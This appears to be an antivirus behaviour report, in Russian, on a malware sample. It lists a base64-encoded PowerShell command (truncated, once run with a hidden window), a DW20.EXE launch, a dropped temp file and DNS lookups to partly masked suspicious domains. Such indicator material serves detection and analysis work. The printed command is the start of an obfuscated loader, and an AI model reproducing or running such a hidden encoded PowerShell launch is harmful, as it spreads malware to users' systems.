Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAFYARQBSAEIATwBTAGUAUABSAEUARgBlAHIAZQBuAGMAZQAuAFQATwBTAFQAUgBpAG4ARwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAE8AaQBOACcAJwApACAAKABOAGUAdwAtAE8AQgBqAGUAQwB0ACAAIABJAG8ALgBTAHQAcgBFAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1528
- %TEMP%\866835.cvr
- DNS ASK in###tips.com
- DNS ASK al###aemlak.com
- DNS ASK hi#####sewriters.com
- DNS ASK ge#####achillers.com
- DNS ASK ja#####eneration.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAIAAkAFYARQBSAEIATwBTAGUAUABSAEUARgBlAHIAZQBuAGMAZQAuAFQATwBTAFQAUgBpAG4ARwAoACkAWwAxACwAMwBdACsAJwB4ACcALQBKAE8AaQBOACcAJwApACAAKABOAGUAdwAtAE8AQgBqAGUAQwB0ACAAIABJAG8ALgBTAHQAcgBFAG...' (со скрытым окном)